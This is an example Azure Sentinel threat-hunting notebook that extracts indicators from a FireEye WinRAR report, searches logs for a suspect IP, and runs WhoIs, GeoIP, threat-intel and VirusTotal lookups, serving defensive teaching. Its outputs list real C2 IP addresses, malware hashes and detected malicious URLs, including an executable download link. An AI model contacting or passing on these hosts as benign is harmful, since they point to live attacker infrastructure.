Title: Sample Hunting and Investigation in Jupyter

Linux, Windows, Network and Office data

Notebook Version: 1.0
[Platform Requirements[(#platform_reqs)

Description:

This is an example notebook demonstrating techniques to trace the path of an attacker in an organization. Most of the steps use relatively simple Log Analytics queries but it also includes a few more advanced procedures such as:

  • Unpacking and decoding Linux Audit logs
  • Clustering events to collapse repetitive items
  • Various visualizations

Technically, the narrative in this notebook is more an investigation than hunting, since the starting point is an alert rather than threat intelligence. However many of the techniques here - such as investigating process activity on Linux and Windows hosts, establishing intercommication via network analysis - are applicable to hunting scenarios as well.

The Investigation Narrative

From an initial alert (or suspect IP address) examine activity on a Linux host, a Windows and Office subscription. Discover malicious activity related to the ip address in each of these.

Warning: Example Notebook - Not for production use!

 This notebooks is meant to be illustrative of specific scenarios and is not actively maintained. 
</font>  It is unlikely to be runnable directly in your environment. Instead, please use the notebooks in the root of this repo. 

Contents

Setup

Make sure that you have installed packages specified in the setup (uncomment the lines to execute)

Install Packages

If this is the first time running any of the Azure Sentinel notebooks you should run the ConfiguringNotebookEnvironment notebook before continuing with this notebook. If you are just viewing the notebook this is not necessary.

Import Packages

Once packages are installed run the next cell to import them.

In [1]:
# Imports
import sys
import warnings

MIN_REQ_PYTHON = (3,6)
if sys.version_info < MIN_REQ_PYTHON:
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
    print('or later is selected as the active kernel.')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)

import numpy as np
from IPython import get_ipython
from IPython.display import display, HTML, Markdown
import ipywidgets as widgets

import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import networkx as nx

import pandas as pd
pd.set_option('display.max_rows', 100)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 300)

import msticpy.sectools as sectools
import msticpy.nbtools as nbtools
import msticpy.nbtools.entityschema as entity
import msticpy.nbtools.kql as qry
import msticpy.nbtools.nbdisplay as nbdisp

# Some of our dependencies (networkx) still use deprecated Matplotlib
# APIs - we can't do anything about it so suppress them from view
from matplotlib import MatplotlibDeprecationWarning
warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning)

WIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),
                   'style': {'description_width': 'initial'}}
display(HTML(nbtools.util._TOGGLE_CODE_PREPARE_STR))

from collections import OrderedDict

# Create an observation collector list
from collections import namedtuple
Observation = namedtuple('Observation', ['caption', 'description', 'item', 'link'])
observation_list = OrderedDict()
def display_observation(observation):
    display(Markdown(f'### {observation.caption}'))
    display(Markdown(observation.description))
    display(Markdown(f'[Go to details](#{observation.link})'))
    display(observation.item)

def add_observation(observation):
    observation_list[observation.caption] = observation

Contents

Part 1 - Threat Intel Report


Getting IoC IP Addresses

Threat intelligence is a vital tool in the amory of hunters and security investigators. Many companies subscribe to Threat Intelligence feeds from companies like Project Cymru, FireEye, Crowdstrike and others (Azure Sentinel customers can make these data subscriptions to enhance their alerts and queries used in Azure Sentinel). In other cases your threat intel may arrive via a CERT notification or a random tip-off of activity via email.

For the purposes of this notebook and a desire to make it more accessible to those who don't have ready access to a threat intelligence feed we're going to scrape some threat intelligence Indicators of Compromise (IoCs) from a public report.

Let's pick a recent report from FireEye WinRAR Zero-day Abused in Multiple Campaigns by Dileep Kumar Jallepalli.

The content of this report is not directly relevant to our investigation - we're just using this an example of something that you might receive and want to see if any of the Indicators of Compromise (IoC) listed in the report show up in your organization. I would stress that this is not a recommended way to consume threat intelligence data from FireEye or any other company and is only done here to provide a starting point for the notebook and accompanying blog. For one thing, you may be in violation of terms of service of the company and, for another, the threat intel listed in these types of reports represents a tiny fraction of the data that these companies provide as part of a commercial agreement.

In [2]:
# This report could equally be an email or some other text that you want to retrieve IoCs from.
import requests
url = 'https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html'
response = requests.get(url)
if response.status_code != 200:
    print('Url request failed')

# We want to extract IoCs from this report
# FireEye list domains and ips with the final dot obfuscated - possibly to deter people from doing what I'm doing here.
# My apologies to FireEye in advance
ip_iocs = str(response.content).replace('[.]', '.')

We want to quickly extract relevant IoCs from reports and emails. Although this isn't the original purpose of this module we can use IoCExtract to help us do this.

In [3]:
from msticpy.sectools import IoCExtract
ioc_extr = IoCExtract()

help(IoCExtract)
Help on class IoCExtract in module msticpy.sectools.iocextract:

class IoCExtract(builtins.object)
 |  IoC Extractor - looks for common IoC patterns in input strings.
 |  
 |  The extract() method takes either a string or a pandas DataFrame
 |  as input. When using the string option as an input extract will
 |  return a dictionary of results. When using a DataFrame the results
 |  will be returned as a new DataFrame with the following columns:
 |  IoCType: the mnemonic used to distinguish different IoC Types
 |  Observable: the actual value of the observable
 |  SourceIndex: the index of the row in the input DataFrame from
 |  which the source for the IoC observable was extracted.
 |  
 |  The class has a number of built-in IoC regex definitions.
 |  These can be retrieved using the ioc_types attribute.
 |  
 |  Addition IoC definitions can be added using the add_ioc_type
 |  method.
 |  
 |  Note: due to some ambiguity in the regular expression patterns
 |  for different types and observable may be returned assigned to
 |  multiple observable types. E.g. 192.168.0.1 is a also a legal file
 |  name in both Linux and Windows. Linux file names have a particularly
 |  large scope in terms of legal characters so it will be quite common
 |  to see other IoC observables (or parts of them) returned as a
 |  possible linux path.
 |  
 |  Methods defined here:
 |  
 |  __init__(self)
 |      Intialize new instance of IoCExtract.
 |  
 |  add_ioc_type(self, ioc_type: str, ioc_regex: str, priority: int = 0, group: str = None)
 |      Add an IoC type and regular expression to use to the built-in set.
 |      
 |      Parameters
 |      ----------
 |      ioc_type : str
 |          A unique name for the IoC type
 |      ioc_regex : str
 |          A regular expression used to search for the type
 |      priority : int, optional
 |          Priority of the regex match vs. other ioc_patterns. 0 is
 |          the highest priority (the default is 0).
 |      group : str, optional
 |          The regex group to match (the default is None,
 |          which will match on the whole expression)
 |      
 |      Notes
 |      -----
 |      Pattern priorities.
 |          If two IocType patterns match on the same substring, the matched
 |          substring is assigned to the pattern/IocType with the highest
 |          priority. E.g. `foo.bar.com` will match types: `dns`, `windows_path`
 |          and `linux_path` but since `dns` has a higher priority, the expression
 |          is assigned to the `dns` matches.
 |  
 |  extract(self, src: str = None, data: pandas.core.frame.DataFrame = None, columns: List[str] = None, os_family='Windows', ioc_types: List[str] = None, include_paths: bool = False) -> Any
 |      Extract IoCs from either a string or pandas DataFrame.
 |      
 |      Parameters
 |      ----------
 |      src : str, optional
 |          source string in which to look for IoC patterns
 |          (the default is None)
 |      data : pd.DataFrame, optional
 |          input DataFrame from which to read source strings
 |          (the default is None)
 |      columns : list, optional
 |          The list of columns to use as source strings,
 |          if the `data` parameter is used. (the default is None)
 |      os_family : str, optional
 |          'Linux' or 'Windows' (the default is 'Windows'). This
 |          is used to toggle between Windows or Linux path matching.
 |      ioc_types : list, optional
 |          Restrict matching to just specified types.
 |          (default is all types)
 |      include_paths : bool, optional
 |          Whether to include path matches (which can be noisy)
 |          (the default is false - excludes 'windows_path'
 |          and 'linux_path'). If `ioc_types` is specified
 |          this parameter is ignored.
 |      
 |      Returns
 |      -------
 |      Any
 |          dict of found observables (if input is a string) or
 |          DataFrame of observables
 |      
 |      Notes
 |      -----
 |      Extract takes either a string or a pandas DataFrame as input.
 |      When using the string option as an input extract will
 |      return a dictionary of results.
 |      When using a DataFrame the results will be returned as a new
 |      DataFrame with the following columns:
 |      - IoCType: the mnemonic used to distinguish different IoC Types
 |      - Observable: the actual value of the observable
 |      - SourceIndex: the index of the row in the input DataFrame from
 |      which the source for the IoC observable was extracted.
 |      
 |      IoCType Pattern selection
 |      The default list is:  ['ipv4', 'ipv6', 'dns', 'url',
 |      'md5_hash', 'sha1_hash', 'sha256_hash'] plus any
 |      user-defined types.
 |      'windows_path', 'linux_path' are excluded unless `include_paths`
 |      is True or explicitly included in `ioc_paths`.
 |  
 |  validate(self, input_str: str, ioc_type: str) -> bool
 |      Check that `input_str` matches the regex for the specificed `ioc_type`.
 |      
 |      Parameters
 |      ----------
 |      input_str : str
 |          the string to test
 |      ioc_type : str
 |          the regex pattern to use
 |      
 |      Returns
 |      -------
 |      bool
 |          True if match.
 |  
 |  ----------------------------------------------------------------------
 |  Data descriptors defined here:
 |  
 |  __dict__
 |      dictionary for instance variables (if defined)
 |  
 |  __weakref__
 |      list of weak references to the object (if defined)
 |  
 |  ioc_types
 |      Return the current set of IoC types and regular expressions.
 |      
 |      Returns
 |      -------
 |      dict
 |          dict of IoC Type names and regular expressions
 |  
 |  ----------------------------------------------------------------------
 |  Data and other attributes defined here:
 |  
 |  DNS_REGEX = r'((?=[a-z0-9-]{1,63}\.)[a-z0-9]+(-[a-z0-9]+)*\.){2,}[a-z]...
 |  
 |  IPV4_REGEX = r'(?P<ipaddress>(?:[0-9]{1,3}\.){3}[0-9]{1,3})'
 |  
 |  IPV6_REGEX = r'(?<![:.\w])(?:[A-F0-9]{1,4}:){7}[A-F0-9]{1,4}(?![:.\w])...
 |  
 |  LXPATH_REGEX = '(?P<root>/+||[.]+)\n            (?P<folder>/(?:[^...|\...
 |  
 |  MD5_REGEX = '(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0...
 |  
 |  SHA1_REGEX = '(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{40})(?:$|[^A-Fa-f...
 |  
 |  SHA256_REGEX = '(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{64})(?:$|[^A-Fa...
 |  
 |  URL_REGEX = "\n            (?P<protocol>(https?|ftp|telnet|lda...nt>([...
 |  
 |  WINPATH_REGEX = '\n            (?P<root>[a-z]:|\\\\\\\\[a-z0-9_.$-]+||...
 |  
 |  __annotations__ = {'_content_regex': typing.Dict[str, msticpy.sectools...

In [4]:
iocs_found = ioc_extr.extract(src=ip_iocs, ioc_types=['ipv4', 'url', 'dns', 'md5_hash', 'sha1_hash'])
if 'ipv4' in iocs_found:
    print('IPs in report')
    for item in iocs_found['ipv4']:
        print(f'\t{item}')
if 'url' in iocs_found:
    print('Urls in report')
    for item in (url for url in iocs_found['url'] if 'fireeye' not in url.lower()):
        print(f'\t{item}')
if 'md5_hash' in iocs_found:
    print('MD5 Hashes in report')
    for item in iocs_found['md5_hash']:
        print(f'\t{item}')
if 'dns' in iocs_found:
    print('Domains in report')
    for item in (dns for dns in iocs_found['dns'] if 'fireeye' not in dns.lower()):
        print(f'\t{item}')
IPs in report
	185.49.71.101
	47.91.56.21
	103.225.168.159
	31.148.220.53
	89.34.111.113
	185.162.131.92
Urls in report
	https://twitter.com/360TIC/status/1101022904156741632
	http://tiny-share.com/direct/7dae2d144dae4447a152bef586520ef8
	http://schema.org/ListItem
	http://schema.org/Person
	http://schema.org/BlogPosting
	https://www.win-rar.com/start.html
	https://schema.org/Brand
	http://schema.org/BreadcrumbList
	https://ti.360.net/blog/articles/upgrades-in-winrar-exploit-with-social-engineering-and-encryption/
	https://www.cswe.org/getattachment/Accreditation/Accreditation-Process/Candidacy-Eligibility-Application-Help-Document.pdf.aspx
	http://schema.org/WPHeader
	https://itunes.apple.com/us/podcast/eye-on-security/id1073779629?mt=2
	https://cloud.typography.com/6746836/6977592/css/fonts.css
	https://research.checkpoint.com/extracting-code-execution-from-winrar/
	http://schema.org/WebPage
MD5 Hashes in report
	2961C52F04B7FDF7CCF6C01AC259D767
	96986B18A8470F4020EA78DF0B3DB7D4
	3aabc9767d02c75ef44df6305bc6a41f
	79B53B4555C1FB39BA3C7B8CE9A4287E
	9b81b3174c9b699f594d725cf89ffaa4
	f36404fb24a640b40e2d43c72c18e66b
	7dae2d144dae4447a152bef586520ef8
	31718d7b9b3261688688bdc4e026db99
	062801f6fdbda4dd67b77834c62e82a4
	719d34d31c8e3a6e6fffd425f7e032f3
	9b19753369b6ed1187159b95fc8a81cd
	8e067e4cda99299b0bf2481cc1fd8e12
	12def981952667740eb06ee91168e643
	0f56b04a4e9a0df94c7f89c1bccf830c
	dc63d5affde0db95128dac52f9d19578
	914ac7ecf2557d5836f26a151c1b9b62
	119A0FD733BC1A013B0D4399112B8626
	1f5fa51ac9517d70f136e187d45f69de
	97D74671D0489071BAA21F38F456EB74
	eca09fe8dcbc9d1c097277f2b3ef1081
	49419d84076b13e96540fdd911f1c2f0
	1BA398B0A14328B9604EEB5EBF139B40
	8c93e024fc194f520e4e72e761c0942d
	1322340356018696d853e0ac6f7ce3a2
	BCC49643833A4D8545ED4145FB6FDFD2
	AAC00312A961E81C4AF4664C49B4A2B2
	e9815dfb90776ab449539a2be7c16de5
Domains in report
	www.facebook.com
	csrf.min.js
	fw.min.js
	c09.c09v1.has
	ti.360.net
	6si.min.js
	s7.addthis.com
	Heur.BZC.ONG.Boxter
	utils.min.js
	www.khuyay.org
	Trojan.Win.Azorult
	itunes.apple.com
	fdc.blog.replaceFormWithThankYou
	fw.min.css
	redesign-2018.min.css
	www.win-rar.com
	Exploit.ACE-PathTraversal.Gen
	www.alahbabgroup.com
	Analytics.ClientContextUtils.init
	s.className.replace
	tags.tiqcdn.com
	window.Granite.csrf
	Thumbs.db.lnk
	Candidacy-Eligibility-Application-Help-Document.pdf.aspx
	Trojan.Agent.DPAS
	window.location.href
	geoipResponse.country.iso
	a.parentNode.insertBefore
	Picture7.5.png
	forms2.min.js
	fdc.blog.initCheckboxes
	data.blogs.length
	String.prototype.indexOf.apply
	kernel.min.js
	j.6sc.co
	fdc.geoipResponse.country.iso
	jquery.min.js
	String.prototype.includes
	cloud.typography.com
	www.cswe.org
	Exploit.Agent.VA
	base.min.css
	elem.parentNode.insertBefore
	b.6sc.co
	fdc.geoipResponse.country
	www.youtube.com
	s.parentNode.insertBefore
	shared.min.js
	vnd.microsoft.icon
	nav.min.js
	Generic.MSIL.PasswordStealerA
	modern.min.js
	www.linkedin.com
	Exploit.Agent.UZ
	research.checkpoint.com
	Analytics.SegmentMgr.loadSegments
	granite.min.js
	window.location.pathname

At this point we're going to cheat a little (I said earlier that the FireEye report was not related to the notebook). We will take the list of IPs from the report and add in the IP Address of our fictonal attacker.

In [5]:
c2_ips = list(iocs_found['ipv4'])
c2_ips.append('23.97.60.214')
c2_ips
Out[5]:
['185.49.71.101',
 '47.91.56.21',
 '103.225.168.159',
 '31.148.220.53',
 '89.34.111.113',
 '185.162.131.92',
 '23.97.60.214']

Authenticate to Azure Sentinel

Get the Workspace ID

To find your Workspace Id go to Log Analytics. Look at the workspace properties to find the ID.

In [6]:
import os
from msticpy.nbtools.wsconfig import WorkspaceConfig
ws_config_file = 'config.json'

WORKSPACE_ID = None
TENANT_ID = None
try:
    ws_config = WorkspaceConfig(ws_config_file)
    display(Markdown(f'Read Workspace configuration from local config.json '
                     f'for workspace **{ws_config["workspace_name"]}**'))
    for cf_item in ['tenant_id', 'subscription_id', 'resource_group',
                    'workspace_id', 'workspace_name']:
        display(Markdown(f'**{cf_item.upper()}**: {ws_config[cf_item]}'))
                     
    if ('cookiecutter' not in ws_config['workspace_id'] or
            'cookiecutter' not in ws_config['tenant_id']):
        WORKSPACE_ID = ws_config['workspace_id']
        TENANT_ID = ws_config['tenant_id']
except:
    pass

if not WORKSPACE_ID or not TENANT_ID:
    display(Markdown('**Workspace configuration not found.**\n\n'
                     'Please go to your Log Analytics workspace, copy the workspace ID'
                     ' and/or tenant Id and paste here.<br> '
                     'Or read the workspace_id from the config.json '
                     'in your Azure Notebooks project.'))
    ws_config = None
    ws_id = nbtools.GetEnvironmentKey(env_var='WORKSPACE_ID',
                                      prompt='Please enter your Log Analytics Workspace Id:',
                                      auto_display=True)
    ten_id = nbtools.GetEnvironmentKey(env_var='TENANT_ID',
                                       prompt='Please enter your Log Analytics Tenant Id:',
                                       auto_display=True)

Read Workspace configuration from local config.json for workspace {{cookiecutter.workspace_name}}

TENANT_ID: 72f988bf-86f1-41af-91ab-2d7cd011db47

SUBSCRIPTION_ID: {{cookiecutter.subscription_id}}

RESOURCE_GROUP: {{cookiecutter.resource_group}}

WORKSPACE_ID: 52b1ab41-869e-4138-9e40-2a4457f09bf0

WORKSPACE_NAME: {{cookiecutter.workspace_name}}

Authenticate to Log Analytics

If you are using user/device authentication, run the following cell.

  • Click the 'Copy code to clipboard and authenticate' button.
  • This will pop up an Azure Active Directory authentication dialog (in a new tab or browser window). The device code will have been copied to the clipboard.
  • Select the text box and paste (Ctrl-V/Cmd-V) the copied value.
  • You should then be redirected to a user authentication page where you should authenticate with a user account that has permission to query your Log Analytics workspace.

Use the following syntax if you are authenticating using an Azure Active Directory AppId and Secret:

%kql loganalytics://tenant(aad_tenant).workspace(WORKSPACE_ID).clientid(client_id).clientsecret(client_secret)

instead of

%kql loganalytics://code().workspace(WORKSPACE_ID)

Note: you may occasionally see a JavaScript error displayed at the end of the authentication - you can safely ignore this.
On successful authentication you should see a popup schema button.

In [7]:
if not WORKSPACE_ID or not TENANT_ID:
    try:
        WORKSPACE_ID = ws_id.value
        TENANT_ID = ten_id.value
    except NameError:
        raise ValueError('No workspace or Tenant Id.')

nbtools.kql.load_kql_magic()
%kql loganalytics://code().tenant(TENANT_ID).workspace(WORKSPACE_ID)

Contents

Search for C2


Set Query Time Range

Specify a time range to search for alerts. One this is set run the following cell to retrieve any alerts in that time window. You can change the time range and re-run the queries until you find the alerts that you want.

In [11]:
from datetime import datetime
search_origin = datetime(2019, 2, 18)
search_q_times = nbtools.QueryTime(units='day', max_before=20,
                                   before=1, max_after=1, origin_time=search_origin)
search_q_times.display()
In [15]:
# Let's query our Azure Sentinel data to see if any records 
# contain any of these IPs and print which tables we find them
# in.

query_template = '''
search "{ip_addr}"
| where TimeGenerated >= datetime({start})
| where TimeGenerated <= datetime({end})
| summarize count() by Type
'''

# Using search repeatedly like this is a bit inefficient - you can get a quick indicator 
# if there are any matches with the syntax:
# search "ipaddr1" or "ipaddr2" or ....
# but if there are matches this doesn't tell you which IP matched.
for ip in c2_ips:
    query = query_template.format(ip_addr=ip,
                                  start=search_q_times.start,
                                  end=search_q_times.end)
    df, result = qry.exec_query_string(query)
    print(f'Searching for ip {ip}...', end=' ')
    if df is not None and not df.empty:
        print(f'Found results for {ip}:')
        display(df)
    else:
        print('no matches found')
Searching for ip 185.49.71.101... no matches found
Searching for ip 47.91.56.21... no matches found
Searching for ip 103.225.168.159... no matches found
Searching for ip 31.148.220.53... no matches found
Searching for ip 89.34.111.113... no matches found
Searching for ip 185.162.131.92... no matches found
Searching for ip 23.97.60.214... Found results for 23.97.60.214:
Type count_
0 SecurityAlert 14
1 SecurityDetection 1
2 AzureActivity 1
3 Syslog 1
4 SSHAlertDataV2_CL 3
5 BYOThreatIntelv1_CL 1
6 AuditLog_CL 7
7 AzureNetworkAnalytics_CL 90

We can see that we have 14 alerts in that period that match the final IP in the list. Let's have a look at those.

In [24]:
alert_list = qry.list_alerts(provs=[search_q_times])
print(len(alert_counts), ' distinct alert types')
print(len(alert_list), ' distinct alerts')
display(HTML('<h2>Top alerts</h2>'))
display(alert_list[['AlertName', 'CompromisedEntity', 'TenantId']]
        .groupby(['AlertName', 'CompromisedEntity'])
        .count()
        .rename(columns={'TenantId':'Count'}))
3  distinct alert types
19  distinct alerts

Top alerts

Count
AlertName CompromisedEntity
Detected suspicious file download MSTICALERTSLXVM2 1
SSH Anomalous Login ML 18

Contents

Examine an Alert

Pick an alert from a list of retrieved alerts.

This section extracts the alert information and entities into a SecurityAlert object allowing us to query the properties more reliably.

In particular, we use the alert to automatically provide parameters for queries and UI elements. Subsequent queries will use properties like the host name and derived properties such as the OS family (Linux or Windows) to adapt the query. Query time selectors like the one above will also default to an origin time that matches the alert selected.

The alert view below shows all of the main properties of the alert plus the extended property dictionary (if any) and JSON representations of the Entity.

Select alert from list

As you select an alert, the main properties will be shown below the list.

Use the filter box to narrow down your search to any substring in the AlertName.

In [25]:
security_alert = None
def show_full_alert(selected_alert):
    global security_alert
    security_alert = nbtools.SecurityAlert(alert_select.selected_alert)
    nbtools.disp.display_alert(security_alert, show_entities=True)
alert_select = nbtools.SelectAlert(alerts=alert_list, action=show_full_alert)
alert_select.display()

Looking at the SSH Anomalous logons we can see our IP address as the origin IP. Looking at the one SuspiciousFileDownload alert, we can see (buried in the Process Entity) that the same IP Address was used as the host address from an http download.

Check alert for IP addresses not contained in entities

Additional IP addresses found in alert are shown below.

In [52]:
# We have the IP address already but we can use the same trick as before
# to pass the alert (squashed into a string) to the IoC extractor to fish out 
# anything interesting
ioc_extractor = sectools.IoCExtract()
new_ips = ioc_extractor.extract(src=str(security_alert), ioc_types=['ipv4', 'ipv6'])

alert_ip_entities = [entity.IpAddress(Address=ip) for ip in new_ips.get('ipv4', [])]
print('IPs in alert\n', alert_ip_entities)

c2_ip_entities = [entity.IpAddress(Address=ip) for ip in c2_ips if ip not in new_ips['ipv4']]
print('Remaining C2 IPs\n', c2_ip_entities)
# Since we didn't find any matches for the other IPs in the list
# we'll use the IPAddress entity that we just created for further investigation
IPs in alert
 [{"Address": "23.97.60.214", "Type": "ipaddress"}]
Remaining C2 IPs
 [{"Address": "185.49.71.101", "Type": "ipaddress"}, {"Address": "47.91.56.21", "Type": "ipaddress"}, {"Address": "103.225.168.159", "Type": "ipaddress"}, {"Address": "31.148.220.53", "Type": "ipaddress"}, {"Address": "89.34.111.113", "Type": "ipaddress"}, {"Address": "185.162.131.92", "Type": "ipaddress"}]

Contents

Basic IP Checks

Reverse IP and WhoIs

In [29]:
# reverse DNS lookup
from dns import reversename, resolver
from ipwhois import IPWhois
for src_ip_entity in alert_ip_entities:
    print('IP:', src_ip_entity.Address)
    print('-'*50)
    
    print('Reverse Name Lookup.')
    rev_name = reversename.from_address(src_ip_entity.Address)
    
    print(rev_name)
    try:
        rev_dns = str(resolver.query(rev_name, 'PTR'))
        display(rev_dns)
    except:
        print('No reverse addr result')
        pass

    print('\nWhoIs Lookup.')
    whois = IPWhois(src_ip_entity.Address)
    whois_result = whois.lookup_whois()
    if whois_result:
        display(whois_result)
    else:
        print('No whois result')
IP: 23.97.60.214
--------------------------------------------------
Reverse Name Lookup.
214.60.97.23.in-addr.arpa.
No reverse addr result

WhoIs Lookup.
{'nir': None,
 'asn_registry': 'arin',
 'asn': '8075',
 'asn_cidr': '23.96.0.0/14',
 'asn_country_code': 'US',
 'asn_date': '2013-06-18',
 'asn_description': 'MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US',
 'query': '23.97.60.214',
 'nets': [{'cidr': '23.96.0.0/13',
   'name': 'MSFT',
   'handle': 'NET-23-96-0-0-1',
   'range': '23.96.0.0 - 23.103.255.255',
   'description': 'Microsoft Corporation',
   'country': 'US',
   'state': 'WA',
   'city': 'Redmond',
   'address': 'One Microsoft Way',
   'postal_code': '98052',
   'emails': ['[email protected]',
    '[email protected]',
    '[email protected]'],
   'created': '2013-06-18',
   'updated': '2013-06-18'}],
 'raw': None,
 'referral': None,
 'raw_referral': None}

Geo IP Lookup

Where does this communication come from?

In [41]:
from msticpy.sectools.geoip import GeoLiteLookup
iplocation = GeoLiteLookup()

for ip_entity in alert_ip_entities:
    if 'Location' not in ip_entity or not ip_entity.Location:
        iplocation.lookup_ip(ip_entity=ip_entity)
    print(ip_entity)
{ 'Address': '23.97.60.214',
  'Location': { 'City': 'Singapore',
                'CountryCode': 'SG',
                'CountryName': 'Singapore',
                'Latitude': 1.2931,
                'Longitude': 103.8558,
                'State': 'Central Singapore Community Development Council',
                'Type': 'geolocation'},
  'Type': 'ipaddress'}
In [43]:
# Why not see it on a map? 
# Clicking on the icon gives you the detail of the IP Address location
from msticpy.nbtools.foliummap import FoliumMap
geo_map = FoliumMap()

geo_map.add_ip_cluster(ip_entities=alert_ip_entities, color='red')

# We can add the other C2 Ips
for ip_entity in c2_ip_entities:
    if 'Location' not in ip_entity or not ip_entity.Location:
        iplocation.lookup_ip(ip_entity=ip_entity)
geo_map.add_ip_cluster(ip_entities=c2_ip_entities, color='purple')
display(geo_map.folium_map)

Contents

Threat Intel - Check the IP Address for known malicious addresses

Lookup in Azure Sentinel Bring-Your-Own-Threat-Intel

In [55]:
# Lookup in Sentinel Bring-Your-Own-Threat-Intel (or IPReputation/Blacklists)
# The TI Kql query - we're substituting the IP address to search for
ti_query = r'''
BYOThreatIntelv1_CL
| where NetworkIP_s == '{ip}'
| project TimeGenerated, ExternalIndicatorId_s, ThreatType_s,
Description_s, Active_s, TrafficLightProtocolLevel_s,
ConfidenceScore_s, ThreatSeverity_s, ExpirationDateTime_t,
IndicatorId_s, NetworkIP_s, Type
'''.format(ip=alert_ip_entities[0].Address)

# run the query, convert to a dataframe and display any result
%kql -query ti_query
ti_query_df = _kql_raw_result_.to_dataframe()
if len(ti_query_df) > 0:
    display(ti_query_df.T)
0
TimeGenerated 2019-02-17 02:54:12.099000
ExternalIndicatorId_s BotnetIndicator1549501989MS525
ThreatType_s Botnet
Description_s This is a botnet indicator generated in RFC5737 documentation space. Take no action on any observables set in this indicator.
Active_s True
TrafficLightProtocolLevel_s Green
ConfidenceScore_s 0
ThreatSeverity_s 0
ExpirationDateTime_t 2019-02-07 02:13:08.525000
IndicatorId_s fe166cf664741ec1c79318971811620e38bf26d69a82e5e1b20953cdaac8a075
NetworkIP_s 23.97.60.214
Type BYOThreatIntelv1_CL

Lookup in VirusTotal

In [45]:
# Get an API key for Virus Total
vt_key = nbtools.GetEnvironmentKey(env_var='VT_API_KEY',
                           help_str='To obtain an API key sign up here https://www.virustotal.com/',
                           prompt='Virus Total API key:')
vt_key.display()
In [51]:
# Lookup the IP Addresses in Virus Total using the msticpy VTLookup class
vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2)

# Let's look for our other C2 IPs - we don't expect our simulated attack 
# address to appear in VT.
# Note, because we're using a free VirusTotal API key here we're limited to
# 4 requests per minute so some requests may error out.
for ip in c2_ip_entities:
    vt_lookup.lookup_ioc(observable=ip.Address, ioc_type='ipv4')
vt_lookup.results.dropna(axis='columns')
Error parsing response to JSON: "89.34.111.113", type "ipv4". (Source index 0)
Error parsing response to JSON: "185.162.131.92", type "ipv4". (Source index 0)
Out[51]:
Observable IoCType Status ResponseCode RawResponse SourceIndex VerboseMsg Positives ResolvedDomains DetectedUrls
0 185.49.71.101 ipv4 Success 1 {"undetected_urls": [], "undetected_downloaded_samples": [], "whois": "NetHandle: NET-185-0-0-0-1\nNetType: Allocated to RIPE NCC\nOrganization: RIPE Network Coordination Centre (RIPE)\nUpdated: 2011-02-08\nOrgName: RIPE Network Coordination Centre\nOrgId: RIPE\nCity: Amsterdam\nPostalCode: 1001... 0 IP address in dataset 13 domsnulya.ru, ns1.univer5.ru, ns2.univer5.ru, univer5.ru, vnestandarta.ru, www.domsnulya.ru, www.univer5.ru http://185.49.71.101/i/pwi_crs.exe, http://185.49.71.101/
1 47.91.56.21 ipv4 Success 1 {"undetected_urls": [], "undetected_downloaded_samples": [{"date": "2017-08-23 06:02:41", "positives": 0, "total": 68, "sha256": "6c490ef9ab1426b0dc3aba4bb7d6c89ce9eb7d193fb19e096516c98bdb36829e"}, {"date": "2019-04-01 01:46:26", "positives": 0, "total": 67, "sha256": "2b67da14e2725a72a8cccb22bb... 0 IP address in dataset 12 consumer-api.unltd.menu http://47.91.56.21/, http://47.91.56.21/verify.php%C5%B1, http://47.91.56.21/verify.php, http://47.91.56.21:10080/verify.php
2 103.225.168.159 ipv4 Success 1 {"asn": 9891, "undetected_downloaded_samples": [{"date": "2019-03-29 03:20:20", "positives": 0, "total": 58, "sha256": "4da03da9731938f9e8d345d416a1e8438da8020ea7d840e22cab83a127c485eb"}], "whois": "Domain Name: P5-MANAGEMENT.COM\nRegistry Domain ID: 1834216074_DOMAIN_COM-VRSN\nRegistrar WHOIS S... 0 IP address in dataset 6 com-cover.com http://103.225.168.159/admin/verify.php
3 31.148.220.53 ipv4 Success 1 {"undetected_urls": [], "undetected_downloaded_samples": [{"date": "2019-03-27 23:53:06", "positives": 0, "total": 67, "sha256": "b56425bd1cdbf0930ff4b3e315cb059ef8c040053453c6ff4609538f843a5d38"}, {"date": "2017-05-26 06:11:46", "positives": 0, "total": 54, "sha256": "60a33e6cf5151f2d52eddae968... 0 IP address in dataset 5 blog.srv-t.pp.ua, drupal.srv-t.pp.ua, ds8610598.clientshostname.com, orgycrazy.com, quickie-chicks.com, sweetgirlsex.com, wafflechicks.com, www.blog.srv-t.pp.ua, www.drupal.srv-t.pp.ua, www.wafflechicks.com http://31.148.220.53/, http://31.148.220.53/login/process.php, http://sweetgirlsex.com/

End of Part 1

We've seen:

  • how to search for IoCs across the different data sets in Azure Sentinel
  • how to use IoCExtract to pull out observables from arbitrary text
  • some of the UI helper widgets like query time setting, alert display to help with quickly assembling a useful notebook
  • how to use the GeoIP lookup and mapping tools
  • how to use the VirusTotal lookup to check IPs for known malware origins

In the next part we'll focus on one of the hosts that we already know has been communicating with one of the suspect IPs and see if we can confirm this to be a successful attack or not. We'll then go on to see what we can learn from network traffic recorded in some of the other data sets to see if the attack has spread beyond this single host.

Contents

Part 2 - See What's going on on the Affected Host - Linux


In the next two sections we will examine the host from where the alert originated. In this case it is a Linux host. While we can get some useful information from standard syslog, we have audit logging configured on our hosts to give us detailed process and logon events.

The only tricky part is that the data is not currently in a very friendly format.

This is a good example of using a combination of LogAnalytics/Kusto process, combined with some local python processing to extract data from arbitrary log types.

In [56]:
host1_q_times = nbtools.QueryTime(label='Set time bounds for alert host - at least 1hr either side of the alert',
                           units='hour', max_before=48, before=2, after=1, 
                           max_after=24, origin_time=security_alert.StartTimeUtc)
host1_q_times.display()

Contents

Using Linux Audit data to view processes

In [58]:
# First let's look at the raw log
# Scroll over to look at the RawData column contents
%kql AuditLog_CL | where RawData contains 'EXECVE' | take 3
